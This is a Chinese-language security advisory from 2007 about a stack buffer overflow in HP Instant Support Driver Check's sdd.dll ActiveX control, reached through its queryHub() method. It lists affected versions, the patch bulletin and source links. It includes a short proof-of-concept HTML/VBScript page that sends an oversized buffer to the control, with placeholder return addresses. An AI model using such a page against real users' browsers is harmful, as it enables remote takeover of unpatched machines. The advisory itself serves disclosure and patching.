发布日期：2007-07-02
更新日期：2007-07-04

受影响系统：

HP Instant Support - Driver Check < v1.5.0.3
    - Microsoft Windows XP SP2

不受影响系统：

HP Instant Support - Driver Check v1.5.0.3

描述：

---

BUGTRAQ  ID: 24730

惠普即时支持驱动程序检测（HP Instant Support Driver Check）功能可帮助客户确定他们是否正在使用最新的打印驱动程序。

HP即时支持驱动程序检查sdd.dll处理参数数据时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制用户机器。

运行在Windows XP平台上的HP即时支持驱动程序检测（sdd.dll，CLSID为156BF4B7-AE3A-4365-BD88-95A75AF8F09D）没有正确地验证传送给queryHub()方式的参数。如果用户受骗访问了恶意站点并向该方式传送了超过226字节的超长参数的话，就可能触发栈溢出，导致执行任意指令。

<*来源：shinnai （shinnai@autistici.org）
  
  链接：http://secunia.com/advisories/25918/
        http://marc.info/?l=bugtraq&m=118347899926354&w=2
        http://www.shinnai.altervista.org/index.php?mod=02_Forum&group=Exploits&argument=Remote&topic=118336
        http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?print=true&objectID=c01077597&printver
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<object classid='clsid:156BF4B7-AE3A-4365-BD88-95A75AF8F09D' id='test'></object>
  <script language = 'vbscript'>
  
   buff             = String(222, "A")

   get_EBP          = "cccc"

   get_EIP          = unescape("aaaa")

   buf1             = unescape("bbbb")

   second_exception = unescape("%00%00%92%00")

   first_exception  = unescape("%00%00%92%00")

   buf2             = String(4000, "B")

   egg              = buff + get_EBP + get_EIP + buf1 + second_exception + first_exception + buf2

   test.queryHub egg

</script>
</html>

建议：

---

厂商补丁：

HP
--
HP已经为此发布了一个安全公告（HPSBPI02228）以及相应补丁:
HPSBPI02228：SSRT071404 rev.1 - HP Instant Support - Driver Check Running on Windows XP, Remote Unauthorized Access
链接：http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?print=true&objectID=c01077597&printver

浏览次数：2814
严重程度：0（网友投票）